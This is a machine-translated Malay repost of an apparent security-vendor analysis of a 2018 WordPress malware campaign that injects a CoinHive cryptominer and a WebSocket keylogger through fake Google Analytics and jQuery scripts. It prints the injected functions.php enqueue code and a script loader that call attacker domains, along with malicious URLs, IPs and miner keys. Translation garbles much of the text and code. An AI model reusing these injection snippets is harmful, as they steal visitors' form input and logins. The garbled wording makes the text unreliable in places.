Penyelesaian Cloudflare [.] Penyelesaian Keylogger pada Domain Baru

January 25, 2018

Beberapa bulan yang lalu, kami melengkapkan dua suntikan yang berkaitan dengan malware "cloudflare.solutions": cryptominer CoinHive yang tersembunyi di dalam Google Analytics jQuery dan keylogger WordPress dari penyelesaian Cloudflare [.] . Malware ini pada asalnya dikenali oleh salah seorang penganalisis kami pada April 2017 dan telah berkembang dan merebak ke domain baru

Spreads Keylogger ke Domain Baru

Beberapa hari selepas jawatan keylogger kami dikeluarkan pada 8 Disember, 2017, domain penyelesaian Cloudflare [.] telah diturunkan. Walau bagaimanapun, ini bukan akhir kempen malware; penyerang segera mencatatkan beberapa domain baru termasuk cdjs [.] dalam talian pada 8 Dis, cdns [.] ws pada 9 Disember dan msdns [.] ] pada 16 Dis.

PublicWWW telah mengenal pasti beberapa laman web yang dijangkiti: 129 laman web untuk cdns [.] ws dan 103 laman web untuk cdjs [.] tetapi kemungkinan besar kebanyakan laman web belum diindeks. Sejak pertengahan bulan Disember, msdns [.] talian telah menjangkiti lebih dari seribu laman web walaupun majoriti adalah rekaman semula dari tapak yang telah dikompromikan

Skrip yang Disuntik Digunakan dalam Serangan

Terdapat pelbagai skrip yang disuntik yang telah digunakan dalam serangan ini pada bulan lalu:

  • hxxps: // cdjs [.] online / lib.js
  • hxxps: // cdjs [.] talian / lib.js? Ver = …
  • hxxps: // cdns [.] ws / lib / googleanalytics.js? Ver = …
  • hxxps: // msdns [.] online / lib / mnngldr.js? Ver = …
  • hxxps: // msdns [.] online / lib / klldr.js

skrip cdjs [.] dalam talian disuntik ke dalam pangkalan data WordPress ( wp_posts ) atau ke dalam fail functions.php kita lihat dalam serangan mantan cloudflare [.] penyelesaian .

skrip ws dan msdns [.] skrip dalam talian juga dijumpai disuntik ke dalam fail functions.php

 fungsi chmnr_klgr_enqueue_script () {
wp_enqueue_script ('chmnr_klgr-js', 'hxxps: //  cdns [.] ws / lib / googleanalytics.js ', false); 

Tidak seperti versi sebelumnya yang mengandungi fungsi "hook_js_scripts untuk mencengkam skrip, serangan ini menggunakan fungsi dan nama-nama cangkuk yang mencadangkan apa tujuan mereka. Sebagai contoh, chmnr_klgr-js kemungkinan besar diterjemahkan kepada " miner_keylogger ".

Evolusi dari GoogleAnalytics Script Fake

Sama seperti versi sebelumnya kempen, kami mengenalpasti palsu googleanalytics.js yang memuat skrip yang terpusat.

Ia mendekodkan kepada kod berikut, mendedahkan fungsi berlabel startGoogleAnalytics :

Disahkan skrip googleanalytics.js

Skrip ini mulaGoogleAnalytics memuatkan tiga skrip lain dari cdns [.] ws :

  1. hxxps: // cdns [.] ws / lib / jquery-3.2.1.min.js? V = 1.013
  2. hxxps: // cdns [.] ws / lib / kl.js
  3. hxxps: // cdns [.] ws / lib / mnrstrtr.js

Nota sisi: Dalam hal libs.js dari cdjs [.] online skrip yang hampir sama dimuatkan, bagaimanapun, ]

Cryptominer dalam jQuery Palsu

Kami telah mengenal pasti bahawa perpustakaan jquery-3.2.1.min.js adalah serupa dengan perpustakaan Cryptomining yang disulitkan CoinHive dari versi terdahulu, dimuatkan dari hxxp: // 3117488091 / lib /jquery-3.2.1.min.js?v=3.2.11 (atau hxxp: // 185 .209 .23 .219 / lib / jquery-3.2.1.min.js? v = 3.2.11 perwakilan alamat IP yang lebih biasa). Ini tidak menghairankan sejak cdjs [.] online juga wujud pada pelayan 185 .209 .23 .219 .

Ia menarik untuk diperhatikan bahawa skrip ini memanjangkan pustaka CoinHive dan menambah konfigurasi alternatif menggunakan 185 .209 .23 .219 pelayan (dan sekarang secara khusus cdjs [.] online ) untuk LIB_URL dan WEBSOCKET_SHARDS.

Dua konflik pelombong

Dalam persediaan baru ini, konfigurasi CoinHive digunakan secara lalai, bagaimanapun; jika sambungan ke pelayan CoinHive gagal, penyerang menggunakan konfigurasi cdjs [.] dalam talian dengan sitekey lZnIoM7JAc6g0xBbWpUsVKSuLPBehT4s sebagai sandaran balik

Untuk memulakan penambang, malware menggunakan mnrstrtr.js (yang sepatutnya diterjemahkan sebagai "starter miner") dimuatkan dari fungsi jahat GoogleAnalytics yang bermula:

 var gstats = new googleanalytics.Anonymous ('NPRak9QU4lFBSneFt23qEIChh5r0SZev'); 

Skrip ini mencipta satu contoh penambang CoinHive dengan kunci laman NPRak9QU4lFBSneFt23qEIChh5r0SZev, yang merupakan kunci yang sama juga dilihat dalam versi lama malware.

Keylogger

Skrip /lib/kl.js adalah akrab k ey l ogger (dengan nama kl.js yang kita lihat pada tahun lalu di malware cloudflare [.] malware .

Dalam tangkapan skrin di bawah, anda dapat melihat bahawa fail Javascript yang diterjemahkan agak sama dengan kempen terdahulu:

Membandingkan perbezaan antara keylogger baru dan lama

Satu-satunya perubahan adalah alamat soketURL, yang kini menjadi " wss: // cdjs [.] dalam talian: 8085 / " (bukan wss: // cloudflare [.] : 8085 ) dan bahagian herring merah dari pemboleh ubah linterkeys berubah dari " https://cdnjs.cloudflare.com/ajax/libs/linter/linter.js " kepada lebih neutral " https://js.io/query ".

Malangnya bagi pengguna dan pemilik laman web yang tidak disengajakan, keylogger bertindak dengan cara yang sama seperti dalam kempen sebelumnya. Skrip menghantar data yang dimasukkan pada setiap bentuk laman web (termasuk borang login) kepada penggodam melalui protokol WebSocket. Anda boleh membaca tentang cara kerja keylogger dalam artikel sebelumnya .

Msdns [.] Suntikan dalam talian

Saya ingin menyerlahkan domain jahat baru msdns [.] dalam talian yang sedikit berbeza dalam tingkah lakunya. Tidak seperti skrip dari dua domain lain, ia berfungsi sama ada cryptominer (hxxps: // msdns [.] dalam talian / lib / mnngldr.js? Ver = … yang masih berpura-pura menjadi Google Analytics dan jQuery) keylogger (hxxps: // msdns [.] online / lib / klldr.js ).

Keylogger memuatkan kod ini:

 var snf = document.createElement ("skrip");
snf.type = "text / javascript";
snf.setAttribute ("defer", "defer");
snf.src = "http://blog.sucuri.net/hxxps://msdns[.]online/lib/kl.js";
document.head.appendChild (snf);

Kod ini kemudian memuatkan skrip [hp1990]: [msdns[.] talian / lib / kl.js . Sejak msdns [.] dalam talian terletak pada server yang sama seperti cdns [.] ws ini kl.js bahagian sebelumnya – ini membantu kami menerjemahkan nama fail klldr.js sebagai "loader keylogger .

Tiga IP Berbahaya

Kami telah mengenal pasti bahawa serangan baru ini menggunakan 3 pelayan berikut:

  • 185.209.23.219 ( cdjs [.] talian atau 3117488091 di mana anda masih boleh menemui penyelesaian cloudflare [1945906] ] versi keylogger)
  • 185.14.28.10 (atau 3104709642 yang masih menjadi tuan rumah hxxp: // 185.14.28 .10 / lib / jquery-3.2.1.min.js ? v = 3.2.11 cryptominer dan penyelesaian cloud cloud [.] versi keylogger hxxp: // 185 .14 .28 10 / lib / kl.js )
  • 107.181.161.159 ( cdns [.] ws dan msdns [.] online – yang menyajikan versi baru cryptominers dan keyloggers)

Kesimpulan

Walaupun serangan baru ini tidak kelihatan seperti besar sebagai kempen penyelesaian cloudflare asli [.]kadar reinfeksi menunjukkan masih terdapat banyak laman web yang gagal melindungi diri mereka selepas jangkitan asal. Ada kemungkinan bahawa beberapa laman web ini tidak menyedari jangkitan asal.

Untuk membersihkan laman web yang telah dikompromi dengan jangkitan ini, anda perlu mengalih keluar kod berniat jahat dari tema functions.php imbasan wp_posts ubah semua kata laluan WordPress (! ) dan kemas kini semua perisian pelayan termasuk tema dan plugin pihak ketiga.

Anda boleh mencari panduan yang lebih terperinci mengenai bagaimana untuk membersihkan tapak WordPress di sini . Sebagai perlindungan tambahan, kami mengesyorkan agar anda mempertimbangkan menggunakan firewall laman web .



Sumber

Bacaan WordPress Yang Lebih Menarik!

Game Addict – Clan War Gaming Theme
Themeforest,
Themeforest,

Game Addict – Clan War Gaming Theme

Pembuat Rojak - May 28, 2018

Penagih Permainan - Melepaskan semangat anda. Permainan Addict adalah tema untuk puak-puak dan permainan. Ia membolehkan anda dapat membuat dan…

Dapatkan Pakej Layout Pejabat Doktor Percuma & Bersih untuk Divi
Elegant Themes,
3 views
Elegant Themes,
3 views

Dapatkan Pakej Layout Pejabat Doktor Percuma & Bersih untuk Divi

Pembuat Rojak - May 27, 2018

Hey Divi Nation! Terima kasih kerana menyertai kami untuk ansuran seterusnya Inisiatif Rekaan Divi mingguan kami; di mana setiap minggu,…

Leave a Comment

Your email address will not be published.